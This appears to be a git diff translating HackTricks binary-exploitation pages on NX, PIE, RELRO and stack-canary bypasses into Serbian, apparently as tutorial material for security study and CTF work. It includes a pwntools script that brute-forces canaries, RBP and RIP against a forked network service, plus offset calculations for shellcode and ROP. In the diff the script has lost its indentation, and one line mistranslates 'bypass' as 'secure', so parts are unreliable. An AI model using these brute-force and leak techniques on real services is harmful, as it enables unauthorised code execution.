sprečio dalju eksploataciju i ponovne pokušaje eksploata. (MTE nema lažno pozitivne rezultate). -## References +## Reference - [https://www.youtube.com/watch?v=UwMt0e_dC_Q](https://www.youtube.com/watch?v=UwMt0e_dC_Q) diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md b/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md index 376dfe6c4..ec1ec6e0e 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md @@ -2,15 +2,15 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel terminology, is a hardware-based security feature designed to **mitigate** the effects of **buffer overflow** attacks. When implemented and enabled, it distinguishes between memory regions that are intended for **executable code** and those meant for **data**, such as the **stack** and **heap**. The core idea is to prevent an attacker from executing malicious code through buffer overflow vulnerabilities by putting the malicious code in the stack for example and directing the execution flow to it. +**No-Execute (NX)** bit, takođe poznat kao **Execute Disable (XD)** u Intel terminologiji, je hardverska bezbednosna funkcija dizajnirana da **ublaži** efekte **buffer overflow** napada. Kada se implementira i aktivira, razlikuje između memorijskih regiona koji su namenjeni za **izvršni kod** i onih koji su namenjeni za **podatke**, kao što su **stack** i **heap**. Osnovna ideja je da se spreči napadač da izvrši zlonamerni kod kroz ranjivosti buffer overflow tako što će staviti zlonamerni kod u stack, na primer, i usmeriti tok izvršenja ka njemu. -## Bypasses +## Obilaženja -- It's possible to use techniques such as [**ROP**](../rop-return-oriented-programing/) **to bypass** this protection by executing chunks of executable code already present in the binary. - - [**Ret2libc**](../rop-return-oriented-programing/ret2lib/) - - [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/) - - **Ret2...** +- Moguće je koristiti tehnike kao što su [**ROP**](../rop-return-oriented-programing/) **da se obezbedi** ovo zaštita izvršavanjem delova izvršnog koda koji su već prisutni u binarnom fajlu. +- [**Ret2libc**](../rop-return-oriented-programing/ret2lib/) +- [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/) +- **Ret2...** {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md index 99a33743d..8db3c01a0 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md @@ -2,30 +2,30 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -A binary compiled as PIE, or **Position Independent Executable**, means the **program can load at different memory locations** each time it's executed, preventing hardcoded addresses. +Binarni fajl kompajliran kao PIE, ili **izvršni fajl nezavisne pozicije**, znači da se **program može učitati na različitim memorijskim lokacijama** svaki put kada se izvrši, sprečavajući hardkodirane adrese. -The trick to exploit these binaries lies in exploiting the **relative addresses**—the offsets between parts of the program remain the same even if the absolute locations change. To **bypass PIE, you only need to leak one address**, typically from the **stack** using vulnerabilities like format string attacks. Once you have an address, you can calculate others by their **fixed offsets**. +Trik za iskorišćavanje ovih binarnih fajlova leži u iskorišćavanju **relativnih adresa**—ofseti između delova programa ostaju isti čak i ako se apsolutne lokacije menjaju. Da biste **obišli PIE, potrebno je da iscuri jedna adresa**, obično sa **stack-a** koristeći ranjivosti poput napada format string. Kada dobijete adresu, možete izračunati druge prema njihovim **fiksnim ofsetima**. -A helpful hint in exploiting PIE binaries is that their **base address typically ends in 000** due to memory pages being the units of randomization, sized at 0x1000 bytes. This alignment can be a critical **check if an exploit isn't working** as expected, indicating whether the correct base address has been identified.\ -Or you can use this for your exploit, if you leak that an address is located at **`0x649e1024`** you know that the **base address is `0x649e1000`** and from the you can just **calculate offsets** of functions and locations. +Koristan savet u iskorišćavanju PIE binarnih fajlova je da njihova **osnovna adresa obično završava sa 000** zbog toga što su memorijske stranice jedinice randomizacije, veličine 0x1000 bajtova. Ova usklađenost može biti kritična **provera ako eksploatacija ne funkcioniše** kako se očekuje, ukazujući na to da li je pravilna osnovna adresa identifikovana.\ +Ili možete ovo koristiti za vašu eksploataciju, ako iscuri da se adresa nalazi na **`0x649e1024`** znate da je **osnovna adresa `0x649e1000`** i odatle možete samo **izračunati ofsete** funkcija i lokacija. -## Bypasses +## Obilaženja -In order to bypass PIE it's needed to **leak some address of the loaded** binary, there are some options for this: +Da biste obišli PIE potrebno je **iscuriti neku adresu učitanog** binarnog fajla, postoje neke opcije za to: -- **Disabled ASLR**: If ASLR is disabled a binary compiled with PIE is always **going to be loaded in the same address**, therefore **PIE is going to be useless** as the addresses of the objects are always going to be in the same place. -- Be **given** the leak (common in easy CTF challenges, [**check this example**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit)) -- **Brute-force EBP and EIP values** in the stack until you leak the correct ones: +- **Onemogućen ASLR**: Ako je ASLR onemogućen, binarni fajl kompajliran sa PIE se uvek **učitava na istoj adresi**, stoga je **PIE beskoristan** jer su adrese objekata uvek na istom mestu. +- Da vam **bude data** curenje (uobičajeno u lakim CTF izazovima, [**proverite ovaj primer**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit)) +- **Brute-force EBP i EIP vrednosti** na stack-u dok ne iscurite prave: {{#ref}} bypassing-canary-and-pie.md {{#endref}} -- Use an **arbitrary read** vulnerability such as [**format string**](../../format-strings/) to leak an address of the binary (e.g. from the stack, like in the previous technique) to get the base of the binary and use offsets from there. [**Find an example here**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass). +- Koristite **arbitrarno čitanje** ranjivost kao što je [**format string**](../../format-strings/) da iscurite adresu binarnog fajla (npr. sa stack-a, kao u prethodnoj tehnici) da dobijete osnovu binarnog fajla i koristite ofsete odatle. [**Pronađite primer ovde**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass). -## References +## Reference - [https://ir0nstone.gitbook.io/notes/types/stack/pie](https://ir0nstone.gitbook.io/notes/types/stack/pie) diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md index 996facccb..1478b56c6 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md @@ -1,56 +1,55 @@ -# BF Addresses in the Stack +# BF Adrese u Steku {{#include ../../../banners/hacktricks-training.md}} -**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.** +**Ako se suočavate sa binarnim fajlom zaštićenim kanarijem i PIE (Poziciono Nezavisna Izvršna Datoteka), verovatno ćete morati da pronađete način da ih zaobiđete.** ![](<../../../images/image (865).png>) > [!NOTE] -> Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\ -> However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting. +> Imajte na umu da **`checksec`** možda neće otkriti da je binarni fajl zaštićen kanarijem ako je statički kompajliran i nije u stanju da identifikuje funkciju.\ +> Međutim, možete to ručno primetiti ako otkrijete da je vrednost sačuvana u steku na početku poziva funkcije i da se ova vrednost proverava pre izlaska. -## Brute-Force Addresses +## Brute-Force Adrese -In order to **bypass the PIE** you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\ -For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.** +Da biste **zaobišli PIE**, potrebno je da **procurite neku adresu**. A ako binarni fajl ne propušta nikakve adrese, najbolje je da **brute-forcujete RBP i RIP sačuvane u steku** u ranjivoj funkciji.\ +Na primer, ako je binarni fajl zaštićen koristeći i **kanarija** i **PIE**, možete početi sa brute-forcovanjem kanarije, zatim će **sledećih** 8 bajtova (x64) biti sačuvani **RBP**, a **sledećih** 8 bajtova će biti sačuvani **RIP.** > [!TIP] -> It's supposed that the return address inside the stack belongs to the main binary code, which, if the vulnerability is located in the binary code, will usually be the case. - -To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP: +> Pretpostavlja se da adresa povratka unutar steka pripada glavnom binarnom kodu, koji, ako je ranjivost locirana u binarnom kodu, obično će biti slučaj. +Da biste brute-forcovali RBP i RIP iz binarnog fajla, možete shvatiti da je validan pogodak bajta tačan ako program nešto ispiše ili jednostavno ne sruši. **Ista funkcija** koja je data za brute-forcovanje kanarije može se koristiti za brute-forcovanje RBP i RIP: ```python from pwn import * def connect(): - r = remote("localhost", 8788) +r = remote("localhost", 8788) def get_bf(base): - canary = "" - guess = 0x0 - base += canary +canary = "" +guess = 0x0 +base += canary - while len(canary) < 8: - while guess != 0xff: - r = connect() +while len(canary) < 8: +while guess != 0xff: +r = connect() - r.recvuntil("Username: ") - r.send(base + chr(guess)) +r.recvuntil("Username: ") +r.send(base + chr(guess)) - if "SOME OUTPUT" in r.clean(): - print "Guessed correct byte:", format(guess, '02x') - canary += chr(guess) - base += chr(guess) - guess = 0x0 - r.close() - break - else: - guess += 1 - r.close() +if "SOME OUTPUT" in r.clean(): +print "Guessed correct byte:", format(guess, '02x') +canary += chr(guess) +base += chr(guess) +guess = 0x0 +r.close() +break +else: +guess += 1 +r.close() - print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) - return base +print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) +return base # CANARY BF HERE canary_offset = 1176 @@ -67,30 +66,25 @@ print("Brute-Forcing RIP") base_canary_rbp_rip = get_bf(base_canary_rbp) RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:]) ``` +Poslednja stvar koju treba da uradite da biste savladali PIE je da izračunate **korisne adrese iz otkrivenih** adresa: **RBP** i **RIP**. -The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**. - -From the **RBP** you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00"_ inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP** an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP: - +Iz **RBP** možete izračunati **gde pišete svoj shell u steku**. Ovo može biti veoma korisno da znate gde ćete napisati string _"/bin/sh\x00"_ unutar steka. Da biste izračunali razdaljinu između otkrivenog RBP-a i vašeg shellcode-a, jednostavno stavite **prekidač nakon otkrivanja RBP-a** i proverite **gde se nalazi vaš shellcode**, zatim možete izračunati razdaljinu između shellcode-a i RBP-a: ```python INI_SHELLCODE = RBP - 1152 ``` - -From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.\ -To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses: +Iz **RIP** možete izračunati **osnovnu adresu PIE binarnog fajla** koja će vam biti potrebna za kreiranje **validnog ROP lanca**.\ +Da biste izračunali osnovnu adresu, jednostavno uradite `objdump -d vunbinary` i proverite poslednje adrese disasemblerovanog koda: ![](<../../../images/image (479).png>) -In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked `0x562002970ecf` the base address is `0x562002970000` - +U tom primeru možete videti da je potrebno samo **1 i po bajt** da se locira sav kod, tako da će osnovna adresa u ovoj situaciji biti **procureni RIP, ali završava na "000"**. Na primer, ako ste procurili `0x562002970ecf`, osnovna adresa je `0x562002970000` ```python elf.address = RIP - (RIP & 0xfff) ``` +## Poboljšanja -## Improvements +Prema [**nekim zapažanjima iz ovog posta**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#extended-brute-force-leaking), moguće je da kada se curi RBP i RIP vrednosti, server neće pasti sa nekim vrednostima koje nisu tačne i BF skripta će pomisliti da je dobila dobre. To je zato što je moguće da **neke adrese jednostavno neće izazvati grešku čak i ako nisu tačne**. -According to [**some observation from this post**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#extended-brute-force-leaking), it's possible that when leaking RBP and RIP values, the server won't crash with some values which aren't the correct ones and the BF script will think he got the good ones. This is because it's possible that **some addresses just won't break it even if there aren't exactly the correct ones**. - -According to that blog post it's recommended to add a short delay between requests to the server is introduced. +Prema tom blog postu, preporučuje se da se uvede kratka kašnjenja između zahteva ka serveru. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md b/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md index 59b406c5e..efae1b946 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md @@ -4,32 +4,30 @@ ## Relro -**RELRO** stands for **Relocation Read-Only**, and it's a security feature used in binaries to mitigate the risks associated with **GOT (Global Offset Table)** overwrites. There are two types of **RELRO** protections: (1) **Partial RELRO** and (2) **Full RELRO**. Both of them reorder the **GOT** and **BSS** from ELF files, but with different results and implications. Speciifically, they place the **GOT** section _before_ the **BSS**. That is, **GOT** is at lower addresses than **BSS**, hence making it impossible to overwrite **GOT** entries by overflowing variables in the **BSS** (rembember writing into memory happens from lower toward higher addresses). +**RELRO** označava **Relocation Read-Only**, i to je bezbednosna funkcija koja se koristi u binarnim datotekama kako bi se smanjili rizici povezani sa **GOT (Global Offset Table)** prepisivanjima. Postoje dve vrste **RELRO** zaštita: (1) **Delimični RELRO** i (2) **Potpuni RELRO**. Obe preuređuju **GOT** i **BSS** iz ELF datoteka, ali sa različitim rezultatima i implikacijama. Konkretno, postavljaju **GOT** sekciju _pre_ **BSS**. To jest, **GOT** je na nižim adresama od **BSS**, što onemogućava prepisivanje **GOT** unosa prelivanjem promenljivih u **BSS** (zapamtite da se pisanje u memoriju dešava od nižih ka višim adresama). -Let's break down the concept into its two distinct types for clarity. +Hajde da razložimo koncept na njegove dve različite vrste radi jasnoće. -### **Partial RELRO** +### **Delimični RELRO** -**Partial RELRO** takes a simpler approach to enhance security without significantly impacting the binary's performance. Partial RELRO makes **the .got read only (the non-PLT part of the GOT section)**. Bear in mind that the rest of the section (like the .got.plt) is still writeable and, therefore, subject to attacks. This **doesn't prevent the GOT** to be abused **from arbitrary write** vulnerabilities. +**Delimični RELRO** koristi jednostavniji pristup za poboljšanje bezbednosti bez značajnog uticaja na performanse binarne datoteke. Delimični RELRO čini **.got samo za čitanje (ne-PLT deo GOT sekcije)**. Imajte na umu da je ostatak sekcije (kao što je .got.plt) i dalje moguće pisati i, stoga, podložan napadima. Ovo **ne sprečava GOT** da bude zloupotrebljen **iz ranjivosti slobodnog pisanja**. -Note: By default, GCC compiles binaries with Partial RELRO. +Napomena: Po defaultu, GCC kompajlira binarne datoteke sa Delimičnim RELRO. -### **Full RELRO** +### **Potpuni RELRO** -**Full RELRO** steps up the protection by **making the entire GOT (both .got and .got.plt) and .fini_array** section completely **read-only.** Once the binary starts all the function addresses are resolved and loaded in the GOT, then, GOT is marked as read-only, effectively preventing any modifications to it during runtime. +**Potpuni RELRO** pojačava zaštitu tako što **čini celu GOT (i .got i .got.plt) i .fini_array** sekciju potpuno **samo za čitanje.** Kada se binarna datoteka pokrene, svi adrese funkcija se rešavaju i učitavaju u GOT, zatim, GOT se označava kao samo za čitanje, efikasno sprečavajući bilo kakve izmene tokom izvršavanja. -However, the trade-off with Full RELRO is in terms of performance and startup time. Because it needs to resolve all dynamic symbols at startup before marking the GOT as read-only, **binaries with Full RELRO enabled may experience longer load times**. This additional startup overhead is why Full RELRO is not enabled by default in all binaries. - -It's possible to see if Full RELRO is **enabled** in a binary with: +Međutim, kompromis sa Potpunim RELRO je u pogledu performansi i vremena pokretanja. Pošto je potrebno da se reše svi dinamički simboli prilikom pokretanja pre nego što se GOT označi kao samo za čitanje, **binarne datoteke sa omogućеним Potpunim RELRO mogu doživeti duže vreme učitavanja**. Ova dodatna prekomerna opterećenja prilikom pokretanja su razlog zašto Potpuni RELRO nije omogućен po defaultu u svim binarnim datotekama. +Moguće je videti da li je Potpuni RELRO **omogućen** u binarnoj datoteci sa: ```bash readelf -l /proc/ID_PROC/exe | grep BIND_NOW ``` - ## Bypass -If Full RELRO is enabled, the only way to bypass it is to find another way that doesn't need to write in the GOT table to get arbitrary execution. +Ako je Full RELRO omogućen, jedini način da se zaobiđe je da se pronađe drugi način koji ne zahteva pisanje u GOT tabelu za dobijanje proizvoljne izvršne radnje. -Note that **LIBC's GOT is usually Partial RELRO**, so it can be modified with an arbitrary write. More information in [Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries)**.** +Napomena da je **LIBC-ova GOT obično Partial RELRO**, tako da se može modifikovati sa proizvoljnim pisanjem. Više informacija u [Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries)**.** {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md index 5c1044b98..2c6bc76ba 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md @@ -2,72 +2,72 @@ {{#include ../../../banners/hacktricks-training.md}} -## **StackGuard and StackShield** +## **StackGuard i StackShield** -**StackGuard** inserts a special value known as a **canary** before the **EIP (Extended Instruction Pointer)**, specifically `0x000aff0d` (representing null, newline, EOF, carriage return) to protect against buffer overflows. However, functions like `recv()`, `memcpy()`, `read()`, and `bcopy()` remain vulnerable, and it does not protect the **EBP (Base Pointer)**. +**StackGuard** umetne posebnu vrednost poznatu kao **canary** pre **EIP (Extended Instruction Pointer)**, specifično `0x000aff0d` (predstavlja null, newline, EOF, carriage return) kako bi se zaštitio od buffer overflow-a. Međutim, funkcije kao što su `recv()`, `memcpy()`, `read()`, i `bcopy()` ostaju ranjive, a ne štiti **EBP (Base Pointer)**. -**StackShield** takes a more sophisticated approach than StackGuard by maintaining a **Global Return Stack**, which stores all return addresses (**EIPs**). This setup ensures that any overflow does not cause harm, as it allows for a comparison between stored and actual return addresses to detect overflow occurrences. Additionally, StackShield can check the return address against a boundary value to detect if the **EIP** points outside the expected data space. However, this protection can be circumvented through techniques like Return-to-libc, ROP (Return-Oriented Programming), or ret2ret, indicating that StackShield also does not protect local variables. +**StackShield** koristi sofisticiraniji pristup od StackGuard-a održavajući **Global Return Stack**, koji čuva sve adrese povratka (**EIPs**). Ova postavka osigurava da bilo kakvo prelivanje ne uzrokuje štetu, jer omogućava poređenje između sačuvanih i stvarnih adresa povratka kako bi se otkrile pojave prelivanja. Pored toga, StackShield može proveriti adresu povratka u odnosu na graničnu vrednost kako bi otkrio da li **EIP** pokazuje izvan očekivanog prostora podataka. Međutim, ova zaštita se može zaobići tehnikama kao što su Return-to-libc, ROP (Return-Oriented Programming), ili ret2ret, što ukazuje da StackShield takođe ne štiti lokalne promenljive. ## **Stack Smash Protector (ProPolice) `-fstack-protector`:** -This mechanism places a **canary** before the **EBP**, and reorganizes local variables to position buffers at higher memory addresses, preventing them from overwriting other variables. It also securely copies arguments passed on the stack above local variables and uses these copies as arguments. However, it does not protect arrays with fewer than 8 elements or buffers within a user's structure. +Ovaj mehanizam postavlja **canary** pre **EBP**, i reorganizuje lokalne promenljive kako bi pozicionirao bafer na višim adresama memorije, sprečavajući ih da prepisuju druge promenljive. Takođe sigurno kopira argumente prosleđene na steku iznad lokalnih promenljivih i koristi te kopije kao argumente. Međutim, ne štiti nizove sa manje od 8 elemenata ili baferima unutar korisničke strukture. -The **canary** is a random number derived from `/dev/urandom` or a default value of `0xff0a0000`. It is stored in **TLS (Thread Local Storage)**, allowing shared memory spaces across threads to have thread-specific global or static variables. These variables are initially copied from the parent process, and child processes can alter their data without affecting the parent or siblings. Nevertheless, if a **`fork()` is used without creating a new canary, all processes (parent and children) share the same canary**, making it vulnerable. On the **i386** architecture, the canary is stored at `gs:0x14`, and on **x86_64**, at `fs:0x28`. +**Canary** je nasumičan broj dobijen iz `/dev/urandom` ili podrazumevana vrednost `0xff0a0000`. Čuva se u **TLS (Thread Local Storage)**, omogućavajući deljenje memorijskih prostora između niti sa globalnim ili statičkim promenljivim specifičnim za nit. Ove promenljive se inicijalno kopiraju iz roditeljskog procesa, a dečiji procesi mogu menjati svoje podatke bez uticaja na roditelja ili braću i sestre. Ipak, ako se **`fork()` koristi bez kreiranja novog canary-a, svi procesi (roditelj i deca) dele isti canary**, što ga čini ranjivim. Na **i386** arhitekturi, canary se čuva na `gs:0x14`, a na **x86_64**, na `fs:0x28`. -This local protection identifies functions with buffers vulnerable to attacks and injects code at the start of these functions to place the canary, and at the end to verify its integrity. +Ova lokalna zaštita identifikuje funkcije sa baferima ranjivim na napade i injektuje kod na početku ovih funkcija kako bi postavio canary, i na kraju da proveri njegovu integritet. -When a web server uses `fork()`, it enables a brute-force attack to guess the canary byte by byte. However, using `execve()` after `fork()` overwrites the memory space, negating the attack. `vfork()` allows the child process to execute without duplication until it attempts to write, at which point a duplicate is created, offering a different approach to process creation and memory handling. +Kada web server koristi `fork()`, omogućava napad silom da pogodi canary bajt po bajt. Međutim, korišćenje `execve()` nakon `fork()` prepisuje memorijski prostor, poništavajući napad. `vfork()` omogućava dečijem procesu da izvrši bez dupliciranja dok ne pokuša da piše, u tom trenutku se kreira duplikat, nudeći drugačiji pristup kreaciji procesa i upravljanju memorijom. -### Lengths +### Dužine -In `x64` binaries, the canary cookie is an **`0x8`** byte qword. The **first seven bytes are random** and the last byte is a **null byte.** +U `x64` binarnim datotekama, canary cookie je **`0x8`** bajt qword. **Prvih sedam bajtova su nasumični** i poslednji bajt je **null bajt.** -In `x86` binaries, the canary cookie is a **`0x4`** byte dword. The f**irst three bytes are random** and the last byte is a **null byte.** +U `x86` binarnim datotekama, canary cookie je **`0x4`** bajt dword. **Prva tri bajta su nasumična** i poslednji bajt je **null bajt.** > [!CAUTION] -> The least significant byte of both canaries is a null byte because it'll be the first in the stack coming from lower addresses and therefore **functions that read strings will stop before reading it**. +> Najmanji značajan bajt oba canary-a je null bajt jer će biti prvi na steku dolazeći iz nižih adresa i stoga **funkcije koje čitaju stringove će stati pre nego što ga pročitaju**. ## Bypasses -**Leaking the canary** and then overwriting it (e.g. buffer overflow) with its own value. +**Curiti canary** i zatim ga prepisati (npr. buffer overflow) sa sopstvenom vrednošću. -- If the **canary is forked in child processes** it might be possible to **brute-force** it one byte at a time: +- Ako je **canary fork-ovan u dečijim procesima** može biti moguće da se **brute-force** jedan bajt po jedan: {{#ref}} bf-forked-stack-canaries.md {{#endref}} -- If there is some interesting **leak or arbitrary read vulnerability** in the binary it might be possible to leak it: +- Ako postoji neka zanimljiva **curenje ili ranjivost u čitanju** u binarnoj datoteci može biti moguće da se curi: {{#ref}} print-stack-canary.md {{#endref}} -- **Overwriting stack stored pointers** +- **Prepisivanje pokazivača sa steka** -The stack vulnerable to a stack overflow might **contain addresses to strings or functions that can be overwritten** in order to exploit the vulnerability without needing to reach the stack canary. Check: +Stek ranjiv na stack overflow može **sadržati adrese do stringova ili funkcija koje mogu biti prepisane** kako bi se iskoristila ranjivost bez potrebe da se dođe do canary-a. Proverite: {{#ref}} ../../stack-overflow/pointer-redirecting.md {{#endref}} -- **Modifying both master and thread canary** +- **Modifikovanje i master i thread canary** -A buffer **overflow in a threaded function** protected with canary can be used to **modify the master canary of the thread**. As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified). +Buffer **overflow u funkciji sa nitima** zaštićenoj canary-em može se koristiti za **modifikovanje master canary-a niti**. Kao rezultat, mitigacija je beskorisna jer se provera koristi sa dva canary-a koja su ista (iako modifikovana). -Moreover, a buffer **overflow in a threaded function** protected with canary could be used to **modify the master canary stored in the TLS**. This is because, it might be possible to reach the memory position where the TLS is stored (and therefore, the canary) via a **bof in the stack** of a thread.\ -As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified).\ -This attack is performed in the writeup: [http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads) +Pored toga, buffer **overflow u funkciji sa nitima** zaštićenoj canary-em može se koristiti za **modifikovanje master canary-a sačuvanog u TLS**. To je zato što, može biti moguće doći do memorijske pozicije gde je TLS sačuvan (i stoga, canary) putem **bof-a na steku** niti.\ +Kao rezultat, mitigacija je beskorisna jer se provera koristi sa dva canary-a koja su ista (iako modifikovana).\ +Ovaj napad je izveden u pisanju: [http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads) -Check also the presentation of [https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015](https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015) which mentions that usually the **TLS** is stored by **`mmap`** and when a **stack** of **thread** is created it's also generated by `mmap` according to this, which might allow the overflow as shown in the previous writeup. +Proverite takođe prezentaciju [https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015](https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015) koja pominje da se obično **TLS** čuva putem **`mmap`** i kada se **steck** **niti** kreira takođe se generiše putem `mmap`, što može omogućiti prelivanje kao što je prikazano u prethodnom pisanju. -- **Modify the GOT entry of `__stack_chk_fail`** +- **Modifikujte GOT unos `__stack_chk_fail`** -If the binary has Partial RELRO, then you can use an arbitrary write to modify the **GOT entry of `__stack_chk_fail`** to be a dummy function that does not block the program if the canary gets modified. +Ako binarna datoteka ima Partial RELRO, onda možete koristiti proizvoljno pisanje da modifikujete **GOT unos `__stack_chk_fail`** da bude dummy funkcija koja ne blokira program ako se canary modifikuje. -This attack is performed in the writeup: [https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/](https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/) +Ovaj napad je izveden u pisanju: [https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/](https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/) -## References +## Reference - [https://guyinatuxedo.github.io/7.1-mitigation_canary/index.html](https://guyinatuxedo.github.io/7.1-mitigation_canary/index.html) - [http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads) diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md index 89eee29ec..d09ac1b35 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md @@ -2,55 +2,54 @@ {{#include ../../../banners/hacktricks-training.md}} -**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.** +**Ako se suočavate sa binarnim fajlom zaštićenim kanarom i PIE (Position Independent Executable), verovatno treba da pronađete način da ih zaobiđete.** ![](<../../../images/image (865).png>) > [!NOTE] -> Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\ -> However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting. +> Imajte na umu da **`checksec`** možda neće otkriti da je binarni fajl zaštićen kanarom ako je statički kompajliran i nije u stanju da identifikuje funkciju.\ +> Međutim, možete to ručno primetiti ako otkrijete da je vrednost sačuvana na steku na početku poziva funkcije i da se ova vrednost proverava pre izlaska. ## Brute force Canary -The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it (network service), because every time you connect to it **the same canary will be used**. +Najbolji način da se zaobiđe jednostavna kanara je ako je binarni fajl program **koji fork-uje dečije procese svaki put kada uspostavite novu vezu** s njim (mrežna usluga), jer svaki put kada se povežete s njim **biće korišćen isti kanar**. -Then, the best way to bypass the canary is just to **brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function **brute-forces an 8 Bytes canary (x64)** and distinguish between a correct guessed byte and a bad byte just **checking** if a **response** is sent back by the server (another way in **other situation** could be using a **try/except**): +Tada je najbolji način da se zaobiđe kanar jednostavno **brute-force-ovati ga karakter po karakter**, i možete da utvrdite da li je pogodjena bajt kanara bila tačna proverom da li je program pao ili nastavlja svoj redovni tok. U ovom primeru funkcija **brute-force-uje 8 Bytes kanar (x64)** i razlikuje između tačno pogodjenog bajta i lošeg bajta samo **proveravajući** da li je **odgovor** poslat nazad od strane servera (drugi način u **drugoj situaciji** mogao bi biti korišćenje **try/except**): -### Example 1 - -This example is implemented for 64bits but could be easily implemented for 32 bits. +### Primer 1 +Ovaj primer je implementiran za 64 bita, ali bi mogao lako da se implementira i za 32 bita. ```python from pwn import * def connect(): - r = remote("localhost", 8788) +r = remote("localhost", 8788) def get_bf(base): - canary = "" - guess = 0x0 - base += canary +canary = "" +guess = 0x0 +base += canary - while len(canary) < 8: - while guess != 0xff: - r = connect() +while len(canary) < 8: +while guess != 0xff: +r = connect() - 